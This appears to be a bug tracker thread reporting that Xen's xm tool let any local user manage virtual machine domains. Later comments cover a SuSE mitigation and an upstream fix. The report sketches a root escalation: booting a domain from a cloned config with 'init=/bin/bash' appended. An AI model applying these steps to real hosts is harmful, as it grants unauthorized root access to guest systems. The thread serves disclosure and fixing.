Description of problem: Any user can use "/usr/sbin/xm [list|create|console|shutdown|destroy|...]" without additional authentication, even with selinux activated. You can even clone a domain config into /tmp, append extra +=" init=/bin/bash" and gain rootaccess to that domain by shutting it down and booting it with the evil clone config. Version-Release number of selected component (if applicable): xen-2-20050522 kernel-xen0-2.6.11-1.1369_FC4 kernel-xenU-2.6.11-1.1369_FC4 How reproducible: Always Steps to Reproduce: Login as local user (uid!=0) and manage doamins with "/usr/sbin/xm". Actual results: You can do whatever you want. Expected results: Only root (or a configurable special user/group) can manage domains. Additional info: This is a known issue. I do not know if it is already fixed completely upstream, but as xen moved from tcp sockets to unix sockets for xm/xend communication, it should be easy to fix. At least with the aid of selinux.
I am not sure if this is still relevant with the unix sockets model, but SuSE did something about this security issue, read chapter "Security" here: http://www.suse.de/~garloff/linux/xen/README.SuSE Quote: "We changed the xend to observe the xend-privileged-port setting (in xend-config.sxp). If it's set to 1, xend will only accept configuration commands from ports below 1024. Together with only binding to localhost, this should provide a minimum of security against local users to change virtual machines."
I agree that this should be improved, but IMHO it should be improved in the upstream Xen code base and not forked in a distribution package. I think Xen fixed the issue upstream, so I will upgrade the package in rawhide soon.
This should be fixed in current Xen 3, and I can't reproduce on FC5test releases.